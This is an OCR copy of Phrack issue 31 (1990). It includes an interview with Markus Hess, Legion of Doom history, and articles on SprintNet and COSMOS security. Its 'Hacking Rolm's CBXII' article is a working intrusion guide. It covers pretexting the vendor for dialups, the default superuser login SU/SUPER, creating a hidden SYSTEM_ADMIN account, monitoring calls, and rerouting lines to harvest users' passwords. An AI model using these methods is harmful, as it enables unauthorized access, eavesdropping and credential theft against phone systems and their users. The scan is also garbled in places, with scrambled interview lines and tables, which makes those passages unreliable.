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Welcome to a new begining of Phrack Inc. Yes, Phrack is not dead. 


On the contrary, Phrack will and can’t ever die. Phrack is more than just 
a technical newsletter that comes out every now and then, it’s a symbol of our 
hacking history. Whether, it’s called Phrack or some other name, it will 


always be published for the same reasons: 
1. Inform it’s readers of current events and other related items 
of hacker interest. 
2. Educate it’s readers on all topics of shared common interests 
that may benefit the hacker at his hobby. 
3. Remain an authority in the hacking world and an observer in the 
ever growing technical community. 
4. Be open to anyone who wishes to submit an article for publication 
that will further the hacker’s education. 

Many things have happened since the last publication of Phrack. We at 
Phrack inc. will try to "shed some light" on the matters that have occured. And 
as for all these ridiculous rumors that have been spreading, let us speak the 
truth and be heard. 

Hah. No my friends, Phrack is not dead.. 

--DH (Editor) 


Note: If you wish to contact Phrack inc. to submit a file, ask around for 
a Phrack inc. distribution site -- Then Email "Phrack inc." and be very very 
patient. 


Note: Special thanks to T C, Phz, and others for wide 
area distribution. 


Phrack XXXI Table of Contents 


31-1. Introduction to Phrack 31 by DH (2K) 

31-2. Phrack Pro-Phile of Markus Hess by PHz (6K) 

31-3. Hacking Rolm’s CBXII by DH (15K) 

31-4. TAMS & Telenet Security by Phreak_Accident (7K) 

31-5. The history of The Legion Of Doom (10K) 
31-6. Cosmos Overview by EBA (52k) 

31-7. Tymnet Security Memo by Anonymous (9K) 

31-8. PWN/Part0Ol by Phreak_Accident (13K) 
31-9. PWN/Part02 by Phreak_Accident (17K) 
31-10. PWN/Part03 by Phreak_Accident (40K) 


2.txt 


ee 


Wed Apr 26 09:43:38 2017 1 


==Phrack Inc.== 
Volume Three, Issue Thirty-one, Phile #2 of 10 
Fal: PHRACK #31 PROPHILE [= 
=*[ Juneo 1; 1990 ]*= 
aed [Phz] *L 


Markus Hess ]--- 


Recently the Phrack editors had the opportunity to talk to Markus Hess in 
his tiny Hannover flat. This special edition of the Phrack Prophile details 
our conversation, as well as general background information about the German 


Hacker. 


This Phrack Prophile is not in the same format as previous ones because of 
the nature of the profile. In the next issue, we will reform back to the 
orginal creator’s format. 


PAST 


AGE: 26 
HEIGHT: 5’ 10" 
HAIR COLOR: BROWN 
EYES: BROWN 
FROM: Hannover, West Germany 
EMPLOYMENT: Software developer in Hannover. 
PEOPLE: Stephen Winero, Walu Holland (Other CCC members) 
STRENGTHS: AT&T Unix, VAX, SunOs and BSD os’s 


Hess, most well known as the hacker who’s exploits are detailed in 
Clifford Stoll’s _The_Cuckoo’s_Egg_, "is as paranoid on the telephone as h 
is on the computer." Although he was very reluctant to talk to us, we did 


manage to talk to him about hacking and _The_Cuckoo’s_Egg_. 
Ringing Hanover.. 
RING 
RING 
RING 
ANSWERED 
HESS: Hallo? 
PHRACK: Is this Markus Hess? 
HESS: Yes. 
PHRACK: Do you smoke Benson & Hedges? 
(At this point we weren’t sure it was actually him) 
HESS: Yes, who is this? 
PHRACK: We are calling from the USA, we want to ask you some questions. 
We talk to hackers in the USA. 
HESS: I won’t have anything to do with hackers anymore. I have talked in 
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court earlier this year. 


PHRACK: Did you know you were in a novel about a hacker in the US? 


Novel? Yes, I know of a novel. 


PHRACK: Have you read the book? 


Yes I have read the book. 


PHRACK: Is it all true? Is it all true? Do you think Cliff lied or tried 


to exaggerate in the book? 
Yes, I think so. 
Yes, He lied. 
Have you ever talked to Stoll? 
I have talked to him, but not privately. I don’t want to talk about 
this. 
Have you ever seen Cliff Stoll? 
Yes I have seen him. 
(We might think this from the back of the book) 
He’s goofy looking isn’t he? 
goofy? I don’t understand. 
Anyway, so you think he lied in the book? 
Yes, he lied. 
What did he lie about? 
I don’t want to talk about this. 
Okay, are you in the Chaos Computer Club? 
No, I won’t have anything to do with hackers any more. 
Were you ever involved with them? 
No. I was not in it. 
Do you know anyone in it [the CCC]? 
Yes. I really must go now. 
Who do you know in it [the CCC]? 
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Stephen Winero. 
Is that it? 

I know Walu. 
Hmm. Are you 
I think so. I 
Were you scar 
jail? 

Prison, were 
I don’t know. 


In your words? 


I don’t underst 
Forget it. 

Do you still 
No. I don’t hav 
Did you think 
No. I knew not 
Has any other 
No. You are the 
So is it my u 


being watched? 
can not talk about this. 
ed of going to jail? 


you scared of going to prison? 


What happened in your words at court? 


I don’t understand. 


What happened in court? 


and. 


have your computer? 

e any computer here. 

they were going to catch you? 

hing of it. 

hackers tried to contact you in the U.S.? 
first-to call . 
nderstanding that Stoll lied in parts of the 


book? 
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Lied? Yes he lied. 
Why do you think he would 
I don’t know. 
Do you think he made you look destructive? 
Yes. He made me look mean. 
Are you? Mean that is? 
(Chuckle) 
No. He made me look like I was a criminal. 
Why did you do it Markus? 
Do what? 
Hack all over the network like that? 
I cannot answer. 
Do they call you a liar in court? 
Yes. They call me a liar. 
What are you going to do now? 
I don’t understand. 
Are you finished with hacking? 
s, I have nothing to do with hackers. 
Was someone helping you hack? 
cannot answer. 
How come you cannot answer that question? 
cannot. 
Yes, well, Many in the U.S. 
What do you think of it? 
is not true. 
don’t know. 
Who taught you the 
cannot say. 
Then you must have been working with someone, 
, L cannot answer. 
Is the police comming down on you hard? 
lice? I don’t und... 
Yeah, yeah. The law? Are they being hard on you. 
Yes. 


lie? 


Ye 
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[hackers] don’t like the Novel. 
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I must go now. 
Can we call you later? 

Umm, I don’t know. No. 

Why not? 

I cannot answer. 

What about in a couple of months? 
Yes, in a couple of months you can call 
Your not moving are you? 
(Knowing that Germans rarely 
numbers never change this was a sil 
No. I no move. 

: Okay, then we’1ll 


ver move and their phone 


ly Q.) 


call you in a couple of months. 
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Okay. I must go. 

K: Wait a second. 

Yes? 

K: Do you have anything to say to American Hackers? 
No. 

I have nothing to do with hackers. 

K: Well, good luck. 

Yes, you too. 

K> 


Unfortunately, our lack of German and Hess’ weak English made 


commu 


nication difficult. He is a very paranoid person who was obviously 


uncomfortable talking to us. 
Those of you that have read Stoll’s book know that Hess was involved 


with 


hacks on American Military Computers, and indirectly involved with 


Computer Espionage and the KGB. Phrack strongly discourages trying to 
hack Military computers and particularly takes offense to computer 


espio 


nage. 


From the information we have gathered from him and by talking to him, 
we feel that Markus Hess wasn’t as smart as Clifford Stoll portrayed him to be. 
We also feel that Markus was not working alone and that others were involved. 
This however we cannot be 100% sure because of our communication faults. 
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Introduction 

IBM Rolm’s CBXII/9000 is a very powerful machine. Powerful in the aspect 
that one has the switch(s) at his control. Controlling switches means you can 
control th ntire PBX environment (And it’s users). 

This file will not get technical. Basically, I’m writing this file on 
the HOW-TO’s of the internal works of CBXII and the basics of obtaining the 
dialups and account information need to access the machines. For further 
information on CBX’s in general, read Epsilon’s Phrack Phile on them, or 
consult Evil Jay’s phile on OSL’s. 


Obtaining Dialups 


Obtaining dialups unfortunately is the hardest part of hacking CBXII’s. 
(Yes, even harder than hacking them). There are several ways to obtain the 
dialups. I would say a good bit of CBX’s are at universities and hospitals 
where they own their own switches. Most of the time you can determine if they 
have one by calling the Telecommunications Department of the target location. 
Or, another way is to check with ROLM. If you *KNOW* that a target location 
has a CBXxx machine, you can call ROLM’s 800 wats line and say your with the 
Telecommunications Department and your looking for the DIALUP. Rolm has files 
on all their CBXxx’s and the Dialups also. They might ask you for a NODE # 
for the dialup, and you should usually respond with what node you want (Since 
different nodes handle different areas of the PBX). Basically, nodes start at 
ONE and usually goto THREE or FOUR, depending on the size of the PBX. 

CBXxx’s are greatly compatible of IBM Rolm’s Phone-Mail system (Which 
is a highly used and common voice mail system). This of course doesn’t mean 
that every PHM (Phone-Mail) system has a CBXxx attached. But it is generally 
a good start. 

The following is a checklist to determine if the target location could 
have a CBXxx for controlling their switch. By no means however, if your target 
location has all of the following it could have a CBXxx. 

1) Does the location handle it’s own switch? 
If so, what kind, and who services it. 
2) Does IBM Rolm handle any aspect of their telecommunications 
department? 
If so, this is a possible CBXxx location. 
3) Does the location have Rolm Phone-Mail? 


These thr guidelines are not requirements. I.E. -- The location 
could have a non-IBM PBX but still have a CBXxx for handling the switch. 
So who knows... It’s up to you and your bullshitting and scans. 


Hacking the CBXxx’s 


Well, once you have obtained the dial-ups, you are almost halfway 
there. Hacking the CBX is the easy part. 1st off, IBM Rolm ships *ALL* 
of their machines with a default account (Yes, and they never change it). 
When the destination of the CBX recieves the machine, they use the default 
to create other accounts for employees, PBX operators, and administration. 
Rolm IBM also has a field support account embedded in the machine. These 
are different to each location and correspond to the serial number of the 
machine (Rolm’s accounts can be obtained from Rolm’s 800 technical support 
line). So, now that we know that there is a default account that telecom 
department uses to setup the other accounts after they recieve the machine, 
tells us that this is a priviledge account. And it is. 

USERNAME: SU 
PASSWORD: SUPER 
How nice for them to give us such power. Yes, it’s a basic default 
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with SuperUser priviledge. If for some reason the account default has been 
changed, their are other ways of getting in: 
1) Call Rolm and get the Field account information. 
2) Try first names of Telecom Dept. employees, and PBX Operators. 
3) Use every Hacking skills you have (If any). 

Some older versions of CBX don’t even require logging in with an 
account. Those versions are less responsive to the administrators needs, 
but can be useful to one also. Don’t be discouraged if the SU password is 
changed, just call Rolm and get the field account. 

The following is the matrix before one access the machine. *Note that 
it clearly identifies* *Also: Accessible at 300 baud and e,7,1* 


CONNECT ID banner 
_Release version # / 
{, /\ 
Rolm CBXII RELEASE 9004.0.65 RB74UCLA11956 
BIND DATE: 8/SEP/88 \ 
YOU HAVE ENTERED NODE 1, CPU 2 \_Name of owner, IE: UCLA 
11:14:30 ON FRIDAY 2/11/1990 (System ID) 
USERNAME: xxx 
PASSWORD: xxx 
INVALID USERNAME-PASSWORD PAIR. 


Once your in 

Once your in, you should have no problems wondering around the 
machine and using the utilities in the machine’s operating system. There is 
very specific help functions inside the machine that will guide you through 
with no problems. At the CBX prompt: 


%. HELP ? 
ong 
%. ? 


Should produce a valid listing of options and sub-functions. Every 
function can be followed with a ’?’ to give lists of valid sub-functions under 


that function or how the syntax of that function should be used. 
The following is a listing of commands for CBXII/9000: 
ABORT ACTIVATE ATTR BYE 
CANCEL CARD CDRSM CDT 
CHANGE CHG CLEAR CLR 
CMPCT CMSTS CNCL CNEG 
CONVERT COPY CPEG CTMON 
CTRA CTRTL CXCLR COPY 
CXCLR CXCON CXNET DACK 
DADD DAEV DANS DBDMP 
DCAT DCF DCOM DDMA 
DDO DDT DE DEACTIVATE 
DEFINE DELETE DEMOUNT DESUM 
DEX DFACK DFCOM DFEA 
DFEVT DHTQ DHWS DIAG 
DIO DISABLE DIWQ DKQ 
DML DMNT DMS DMTST 
DOWN DPATR DPMR DPMS 
DPPRI DPTR DOQQ DRCT 
DREGS DSBLE DSQ DSST 
DSTAK DTCB DTDQ DWQ 
DX_TR ENABLE ENB ENBLE 
ETIO EX EXM EXN 
EXP EXPAND FINIT FORMAT 
FREER FSD GTOD HDBST 
HELP INSTALL KPFA LCT 
LIST LOAD LOGOFF LOGON 
PEG LPKT LSCT LSL 
LST LTCB MNT MONITOR 
MOUNT MTRACE NEXT NSTA 
PAGE PCNFG PDIO PFA 
PKTS PLIST PLT PPFA 
PS PSH QAT QITM 
QTEST RCT RECEIVE RENAME 
REPLY RESTART RESTORE REVERSE 
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RM RMOFF RPFA RSC 
RSCLK RSTOR RSTRT SAT 
SCAN SEND SET SHOW 
SIITM SOCON SOUNC SSAT 
START STATE STATUS STEST 
STOD STOP STR STS 
TDCD EST TKSTS TRTL 
TST TX UNLK UNLOCK 
UP VERIFY XDEF XMIT 
XPND 
These commands can be executed from and ’% ’ prompt. If the command is 
followed by a ’?’, more information will be supplied about the command. 
Using the ICI 


The Interactive Configuration Interface controls immediate changes in 
the switch and PBX environment. The Utility is explained in great detail 
through the actual running of it. You can access the ICI by typing: 

% CNFG 


CBXII/9000 
INTERACTIVE CONFIGURATION INTERFACE 
CPU 2 
15:14:32 ON FRIDAY 5/02/1990 
COMMAND: 
This is the main command prompt. From here you can exercise the ’?’ 

help list to get valid commands. There are four phases of the ICI utility: 
Modify, Create, List, and Delete. These can be used on Extentions, Trunks, 


Logon accounts, Feature Group sequences, Data_line access, Trunk Groups, ect. 
The following is a sample of using ’list’ to list a current extention in the 
PBX: 


_Forward to EXTN 2000 


COMMAND: LIST EXT 4038 / _Outside number 
/ FORWARD ON / to forward to 
FORWARDING BSY RNA DND / 
EXTN YPE COS TARGET1 TARGET2 IE I E I E RINGDOWN NAME 
DS 4038 EXTN 56 2000 11131211 95551212 R.STABELL 
\ \ \ / / \ \ 
Extention / -Class of service if R Auto. Forward Owner of 
-—-Type of line BUSY I No Matter What EXTN. 
(Reg. Extention) N 
G 
Note: The 1’s specifies to forward to target#1l & NO ANSWER 


(As 2’s would mean forward to #2 target) 
This should detail how to modify a listing like above using the ’/MODIFY’ 
command in the ICI. Once modified, all transactions are processed immediately. 


Using the ’Delete’ command one can delete extentions, trunks, ect. 

So now we have the following commands in ICI: MODIFY, DELETE, LIST, CREATE. 
Each can be used with the following "Nouns" to modify that "Noun": 
BUTTON_120 BUTTON_240 CDR_EXCLUDE CNEFG_ERRORS 
CNFG_QUEUE CNFG_STATUS CNFG_USERS COM_GROUP 
COS_FEAT DATA_ACCESS DATA_DEVICE DATA_GROUP 
DATA_LINE DATA_SUBMUX DLI ETS 
EXTEN FAC FAC_TYPE FAMILY 
FEAT_CODE FIRST_DIGIT HD_GROUP LEX 
LOGON_PROFILE MAP MEM_PARTS PARAM 
PICK POWER Q_TYPE ROUTE_LIST 
RP RPD RPI RPS_120S_ON 
RPS_240S_ON SAT_NAME SEARCH_SEQ SECTION 
SECURITY_GROUP SERVICE_LIST SITO_PARTS SLI 
SPEED T1D3 T1D3_GRP TRUNK 
TRUNK_GROUP VPC 

The FAMILY, LOGON_PROFILE, and CNFG_USER all deal with the accounts on 
the system. One can use MODFIY or CREATE to set them up an account with SU 
access. The FAMILY noun is the listing of the groups with different access, 


va ma 


to different "nouns" available. I.E.: Not everyone can access the CHANGE 
LOGON_PROFILE to create an account. 

To create an account with SU access, type (while in ICI): 

% CREATE LOGON_PROFILE 
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ENTER NAME (1-12 CHAR) 
ENTER PASSWORD: TEST 

RETYPE: TEST 
Next it will ask 


: TEST 


you for a family. For SU access, type "SYSTEM_ADMIN". 


After family, the machine should prompt you for a "verb". Verbs are the actual 


functions or commands, 


so in this environment you can set the commands a user 


can access. So, for SU, enter "ALL" for every command access. 
To get a valid listing of users online, try this: 


% LIST CNFG_USERS 


NUMBER OF USERS MAX NUMBER OF USERS 

3 5 
PORT USER_NAME START_TIME HOW_LONG 
17 SU 17:47:57 0:28:34 
2 FIELD 18:16:03 0:0:28 
3 MARYB 18:16:03 0:10:03 
Using the Monitoring Utility 


This command is one of the more powerful commands in the CBXxx system. 


% MONITOR EXT 4038 


10:02:43 ON FRIDAY MAY/02/1990 


The monitor command should be invoked from within the main function command 
level and not in the ICI level. 
watch or monitor TRUNKS and EXTENTIONS. So, if I were to type: 


The monitoring command allows you to actually 


EXT# STATE DI CODE DIGITS PROCESS STATUS 
4038 IDLE STN FWD NUM FWD 

\ \ / / / \ 
Extention Not in use Standard \ / Forwarded 

Extention \ / 
Forwarded to 
a number 
This shows the extention to be IDLE and not in use. But, with forwarded 


call processes to a standard number. You would have to use ICI to look up the 


% MONITOR EXT 4038 


number it’s forwarded to if you wanted. 


10:03:44 ON FRIDAY MAY/11/1990 


EXT# STATE DI CODE DIGITS PROCESS STATUS 

4038 DIAL TONE STN FWD NUM FWD 

4038 DIALING Y 9 i \ \ \ 

4038 DIALING Y 92 S F N \Extention 
4038 DIALING Y 923 t fe) u Forwarded 
4038 DIALING MY: 9233 a N r m 

4038 DIALING Y 92334 nu Ww b 

4038 DIALING M4 923345 dm a e 

4038 DIALING Y 9233456 ab im r 

4038 DIALING ¥ 92334564 re d 

4038 CONN TO25N N \ dr e 

/ \ / \ d 

\ \ \_Dialing NO \_Number dialed 

\_Extention \ 


Connected to 
Outside trunk TO25N 


This monitoring s 


hows the extention actually dialing the number, and then 


connecting to an outside truck. Unfortunatley, one we cannot monitor without 


access to a bell switc 


nN. 


Monitoring can also be done with trunks. I will not display any trunk 


monitoring since it is 


quite simple to decypher. 


Manipulating the switc 


n 


There are many ways you can manipulate the CBX’s to gain accounting 


information on data li 
would be to forward an 
then write an emulatio 


nes within the PBX environment. One sure-fire method 
actual data dial-up extention to a bridge or loop and 
n to intercept the user’s account information real-time 


as they connect to your fake dial-up. 
Or perhaps if an university uses the CBX, one could maybe forward the 


computer help desk ext 


ntion to a bridge or loop and as an unsuspecting user 
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calls up, ask him what machine and account info he has access to for a help 
log sheet you are taking. 

Who cares. Who knows. There are thousands of things you can do to use 
the CBX to your advantage. Hell, you have the whole switch at your command. 
DH — 05/11/90 
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==Phrack Inc.== 
Volume Three, Issue Thirty-one, Phile #4 of 10 
/ Everything you always wanted to know.. \ 
/ about Telenet Security, But were to stupid to find out. \ 
By Phreak_Accident 
Ever since the early 80’s GTE Telenet has been expanding their public 
packet switching system to hold enormous amounts of users. Currently GTE 
SprintNet (Yes, Telenet is out, SprintNet is in.) has over 300 nodes in the 
United States and over 70 other nodes abroad. SprintNet provides private 
X.25 networks for larger companies that may have the need. These private 
networks are all based on SprintNet’s 3270 Dedicated Access Facility which 
is currently operating for public use, Hence for the major security Sprint-— 
Net has aquired. 

SprintNet’s security department is a common idea of what any large 
public packet network should be. With their home office located in Virgina 
(703), most Hacker’s who run into trouble with them would wind up talking 
to Steve Mathews (Not the head of security but a prime force against the 
major attacks Sprintnet recieves from Hackers anually.), who is a very 
intelligable security analysist that deals with this type of problem daily. 

Because of Steve’s awarness on Hackers invading "His" system (As most 
security personnel refer to the system’s they work for as their own.), He 
often does log into Bulletin Boards accross the country looking for Sprint- 
Net related contraband. At the time of this article, Steve is running an 
investigation on "Dr. Dissector’s" NUAA program. (NUA attacker is a Sprint-— 
Net NUA scanner.) Besides this investigation, he currently stays in contact 
with many Hackers in the United States and Abroad. It seems Steve recieves 
many calls a month from selected Hackers that have interests in the Security 
of SprintNet. Wow. Who the Hell would want to call this guy. From many 
observations of Steve Mathews, I find him to in deed be the type to feel a 
bit scared of Hackers. Of course, his fright is really quite common amoung 
security personnel since most fear for their systems as well as themselves. 
(Past experiences have showed them not to take Hackers lightly, Hence they 
have more contacts then 60 rolodex’s put together.) 

For now, let’s forget Steve Mathews. He’s not important an important 
influence in this article. Trying to pin a one-person in a security depart-— 
ment that handles security is like finding a someone on a pirate board that 
doesn’t use the word "CODE" in their daily vocabulary. 

Telenet’s main form of security lies in their security software called 
TAMS (Telenet Access Manager System). The TAMS computers are located in Res-— 
tin, Virginia but are accessable throughout the network. Mostly, the main 
functions of TAMS are to: 

* Check to see if the NUI/Password entered is a valid one. 

* Check to see if the Host has list of NUI’s that can access 

that host. If another NUI is used, a Rejection occurs. 

* Processes SprintNet’s CDR (Call Detail Recording), which 

includes Source and Destination, Time of call, Volumes 
of data recieved, and the Total time of the call. 

* Can be used by host to add an optional "ALPHA" NUA for "easy" 

access. 
Can secure Hosts further by adding an NUA security password. 
Restricts calls without an NUI for billing (I.E. No collect 
calls to be processed). 

* Accepts all calls to host as a prepaid call (I.E. Accepts all 

calls). 
TAMS is really for the handling of NUI and corresponding NUA’s, therefore 
being a security concept. TAMS holds all the data of NUI’s and restricting NUAS 
for the ENTIRE network. If one could gain the access to TAMS, one could have 
the entire network at his/her disposal. This of course if highly impossible 
to SprintNet’s security department, but not for a couple of hackers I have ran 
into. Yes, TAMS is quite interesting. 

In other aspects of SprintNet security, lets focus on the actual X.25 
software that they use. Anybody who tells you that Telenet can monitor the 
sessions currently taking place on THEIR network is WRONG (And probably very 
stupid as well). Monitoring is a basic feature of all X.25 networks, whether 
it’s a little PeeShooter network or not, they can and do monitor sessions. 

Of course their are far to many calls being placed on SprintNet to be 
monitored, but a scared host can always request a full CDR to be put on their 
address to record all sessions comming in on that NUA. Such as the many re- 
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corded sessions of the ALTOS chat(s) in Germany that was a hot-spot for many 
Hackers across the United States and Abroad. After the detection of ALTOS, 
through the hundereds of illegally used NUIs, CDR’s and direct host monitoring 
were used on the ALTOS hosts. As far as prosecutions concern, I doubt their 
were any. 
Now, as far as other security software on SprintNet, they have a call 
tracking service that is called AUTOTRAIL. Basically, AUTOTRAIL traces the 
connections through the DNIC’s and back to the orginating NUI and/or NODE loca- 
tion that placed the call. 
AUTOTRAIL has nothing to do with ANI. Not at all. In fact, the many 
dialups that lead into SprintNet’s PDM gateway do NOT have any type of ANI. 
That is basically a telephony problem. ALthough I would think twice about 
messing with a dialup that is run on a GTE carrier. T 


That’s up to you though. 
Another aspect of security in which Telenet offers is an ASCII tape 

hat can be obtained by a host customer, which contains all CDR information of 

ny connection to that host for the last week/month/year. So, it is obvious 

o say that SprintNet does have a hudge database of all CDRs. Yes, another 

oint: This database is located in the TAMS computer. Hmm, ahh.. Wouldn’t 

hat be neat. 

:PA 


t'o dt @ ct 
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The History of The Legion Of Doom 


During the summer of 1984 an idea was formulated that would ultimately 
change the face of the computer underground forever. This particular 

summer, a huge surge of interest in computer telecommunications placed 

an incredibly large number of new enthusiasts on the national computer scene. 
This crowd of people all seeking to learn as much as possible 

began to put a strain on the nation’s bulletin board scene, as the novices 
stormed the phonelines in search of knowledge. From out of this chaos 

came a need for learned instructors to help pass on their store of 
information to the new throngs. 
One of the most popular bulletin boards of the day was a system in New York 
state called Plovernet, which was run by a person who called himself 
Quasi-Moto. This BBS was so heavily trafficked, that a major long 

distance company began blocking all calls to its number (516-935-2481). 

The co-sysop of Plovernet was a person known as Lex Luthor. At the time 

there were a few hacking groups in existence, such as Fargo-4A and Knights of 
Shadow. Lex was admitted into KOS in early 1984, but after making a few 
suggestions about new members, and having them rejected, Lex decided to 

put up an invitation only BBS and to start forming a new group. 
Starting around May of 1984, Lex began to contact those people who he had 
seen on BBSes such as Plovernet and the people that he knew personally 

who possessed the kind of superior knowledge that the group he envisioned 
should have. Many phone calls and Alliance Teleconferences later, th 
group of individuals who made up the original Legion of Doom were compiled. 
They were: 


Lex Luthor 

Karl Marx 

Mark Tabas 

Agrajag the Prolonged 
King Blotto 

Blue Archer 


EBA 

The Dragyn 

Unknown Soldier 
The group originally consisted of two parts: Legion of Doom, and Legion 
of Hackers. The latter was a sub-group of the first, comprised 
of people who were more advanced in computer related subjects. Later on, 
as members began to all become more computer-based, the Legion of Hackers 
was absolved. (The name "Legion of Doom" came from the cartoon series 


"Superfriends," in which Lex Luthor, Superman’s arch rival, led a group 

by the same name) 

The actual Legion of Doom bulletin board was quite ahead of its time. 

It was one of the first "Invitation-only" hacking based BBSes; it was the 
first BBS with security that caused the system to remain idle until 

a primary password was entered; and it was the first hacking BBS to deal 

with many subjects in close detail, such as trashing and social 

engineering. The BBS underwent three number changes and three different 
login procedures during its life. At its height, the BBS had over 

150 users and averaged about 15 posts per day. This may seem 

high when compared to contemporary BBSes, but this was a private system, 

with only very-competent users, so the quality of messages content was always 
high. 
There was always some confusion that falsely assumed since someone 
as on the LOD BBS, that they were a member of the group. [In fact, 
nly a handful of the total LOD membership were ever on the actual 


ther BBSes after the home base BBS went offline. The first was on 
lottoland, the next on Catch-22, followed by one on the Phoenix Project, 

and the last on Black Ice Private. The group’s members have usually tried to 
keep a low profile publicly, and usually limited their trade of information 
to select private BBSes and personal telephone conversations. This adherence 
to privacy has always added to the LOD mistique. Since most people didn’t 
know exactly what the group was involved in, or experimenting with, people 


W 
fe) 
L 
The Legion of Doom also had special subboards created for its members on 
fe) 
B 
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always assumed that it was something far too detailed or sensitive to be 
discussed. For the most part, this was not true, but it did not help to 
diminish the paranoia of security personnel that LOD was after their 
company’s systems. 

The group has undergone three distinct phases, each a result of membership 
changes. The first phase ended with the busts of Marx, Tabas, Steve Dahl, 
Randy Smith, X-man, and the abandonment by Agrajag and King Blotto. 

The group lay semi-dormant for several months, until a resurgence 

in the summer of 1986, in which several new members were admitted, and a new 
surge of would-be hackers appeared, ready to be tutored. This phase again 


ended in a series of busts and paranoia. The third phase basically revolved 
around Summercon of 1988, where several new members were admitted by those 
LOD members attending the festivites. The third phase is now at an end 


brought on by busts and related paranoia, again, two years after its onset. 
There is no indication that points to any resurgence in the future, but 
nothing is certain until summer. 

Since its creation, LOD has tried to put out informative files on a wide 
variety of topics of interest to its contemporaries. These files ranged from 
the first actual scanned directory of Telenet, to files on various operating 
systems. The LOD Technical Journal was to be a semi-regular electronic 
magazine comprised of such files, and other items of interest to the hacking 
community. Only three issues of the Technical Journal were produced. As 
the fourth issue was being pieced together, several members were raided, and 
work on it was abandoned. 

>From the time it was formed continuing up to the present, the Legion of 
Doom has been quite a topic of controversy in the computer underground and 
with computer security professionals. The Legion of Doom has been 

called everything from "Organized Crime" to "a Communist threat to national 
security" to "an international conspiracy of computer terrorists bent 

on destroying the nation’s 911 service." Nothing comes closer to the 

ctual truth than "bored adolescents with too much spare time." 

members may have entered into systems numbering in the tens of 

housands, they may have peeped into credit histories, they may 

ave monitored telephone calls, they may have snooped into files and 

uffered interesting text, they may still have total control over 

ntire computer networks; but, what damage have they done? None, with 

he exception of unpaid use of CPU time and network access charges. What 
ersonal gains have any members made? None, with the exception of three 
nstances of credit fraud that were instigated by thr separate greedy 
ndividuals, without group knowledge. 

he Legion of Doom will long be remembered in the computer underground as 

an innovative and pioneering force, that consistently raised the collectiv 
level of knowledge, and provided many answers to questions ranging from the 
workings of the telephone system to the structure of computer operating 
systems. No other group dedicated to the persuit of computer and 
telecommunications knowledge has survived longer, and none probably will. 
The Legion of Doom 1984--1990 


[e) 
iw) 
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Alumni of the Fraternal Order of the Legion of Doom (Lambda Omega Delta) 


Handle Entered Exited Location Reasons for leaving 
ex Luthor Early 84-- Florida 

Karl Marx Early 84--Late 85 Colorado Bust w/Tabas..College 
Mark Tabas Early 84--Late 85 Colorado Too numerous to list 
Agrajag the Prolonged Early-84--Late 85 California Loss of Interest 

King Blotto Early 84--Late 85 Ohio College 

Blue Archer Early 84--Late 87 Texas College 

EBA Early 84-- Texas 

The Dragyn Early 84--Late 86 Minnesota Loss of Interest 
Unknown Soldier Early 84--Early 85 Florida Bust-Toll Fraud 

Sharp Razor Late 84--Early 86 New Jersey Bust-Compuserve Abuse 
Sir Francis Drake Late 84--Early 86 California Loss of Interest 

Paul Muad’ dib Late 84--Early 86 New York Modem Broke 

Phucked Agent 04 Late 84--Late 87 California College 

X-Man Late 84--Mid 85 New York Bust-Blue Boxing 
Randy Smith Late 84--Mid 85 Missouri Bust-Credit Fraud 
Steve Dahl Early 85--Early 86 Illinois Bust-Credit Fraud 
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he Warlock 
Terminal Man 
Dr. Who 

The Videosmith 
Kerrang Kahn 
Gary Seven 

The Marauder 
Silver Spy 

Bill from RNOC 
The Leftist 
hantom Phreaker 
Doom Prophet 
Jester Sluggo 
Carrier Culprit 
Master of Impact 
Thomas Covenant 
The Mentor 
Necron 99 
Control C 

Prime Suspect 
The Prophet 
Phiber Optik 

kk AKA kk 

Randy Smith 

Dr. Who 

Kerrang Kahn 
Phantom Phreaker 
Doom Prophet 
Thomas Covenant 
Necron 99 
Control C 


U 


Do 


Rar] 
Parl 
Parl 
Parl 
Parl 
Parl 
Parl 
Late 
Earl 
Mid 
Mid 
Mid 
Mid 
Mid 
Mid 
Earl 
Mid 
Mid 
Mid 
Mid 
Mid 
Earl 


Poof 
Skin 
Red 
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y 85--Late 
y 85--Late 
y 86--Late 
y 86--Mid 
y 86--Mid 
y 86--Mid 
86--Late 
y 87--Late 
87--Late 
87-- 
87-- 
87-- 
87--Mid 
87--Mid 
y 88--Ear] 
88--Ear] 
88--Late 
88--Ear 
88-- 
88--Late 
y 89--Ear] 
| 
ny Puppy 
Eye 


85 
89 
87 
89 
88 
89 
87 
87 
89 


88 
88 
90 
90 
89 
90 


89 
90 


3 


Florida 
Massachusetts 
Massachusetts 
Pennsylvania 
London, UK 
Florida 
Connecticut 
Massachusettts 
New York 
Georgia 
Tllinois 
Illinois 
North Dakota 
Pennsylvania 
California 
New York 
Texas 

Georgia 
Michigan 

New York 
Georgia 

New York 


ANI Failure / Psychedelic Ranger 


The 
Phas 


Trouble Verify 
Sigmund Fraud / Pumpkin Pete 


Urvile 
e Jitter 


Loss of Interest 


Several Reasons 
Paranoia 

Loss of Interest 
Loss of Interest 
Loss of Interest 
College 
Bust—Hacking 
Bust—Hacking 


Loss of Interest 
Loss of Interest 
Bust-—Hacking 
Retired 
Bust-—Hacking 


Bust-—Hacking 
Bust-—Hacking 


Expelled from Group 
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BY 
ERIK BLOODAX 


[7] 


PRELUDE 
In the past, many files have been written about COSMOS. I 

have always been rather disappointed in their quality and in 
their presentation, so I have taken on the responsibility of 
d 
ig 
e 
a 


oing one myself. This should sum up COSMOS for everyone who 

eads it. It contains formats for very useful commands, an 

ntire transaction list, COSMOS "tricks", and a list of all COSMOS 
bbhreviations and their formats. 


INTRODUCTION 
Bell Labs COmputer System for Mainframe OperationS (COSMOS) 
is basically just a database for maintaining records of 
equipment and other line information and generating reports 
on that information. The system is usually set up on a DEC 
PDP 11/45 or 11/70. 
The main responsibilities of the COSMOS system are: 

Maintaining records 

Issuing reports 

Processing service and work orders 

Assigning telephone numbers 

Load balancing for switching computers 

Output of ESS recent change information 


LOGGING ON 

When connecting to COSMOS the system will respond with: 
;Login: or LOGIN: 

at which point you enter a username. The system will then 
prompt: 

PASSWORD: 

at which point you enter the password for that username. 
Finally, the system will prompt: 

WC? 

which asks you to enter the wire center for the exchange you 
will be using in your work. After successfully completing 
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the login sequence you will be given the system prompt which 
will be the two letter id of the wire center you entered anda 


percent sign: "WC%S " 


To log off at this or at any point you can type control-y. 
One of the major flaws in COSMOS security is that unless a 
t, even if 
the user disconnects. Many times when you connect to COSMOS, 


control-y is received the terminal is not logged ou 


you will be dropped right into the "WC% " prompt. 
happens on major BOC packet networks quite often. 


COSNIX shell, and can issue various unix-like comma 
ls, cd, cat, et cetera. 


This even 


If you are 


nds, 


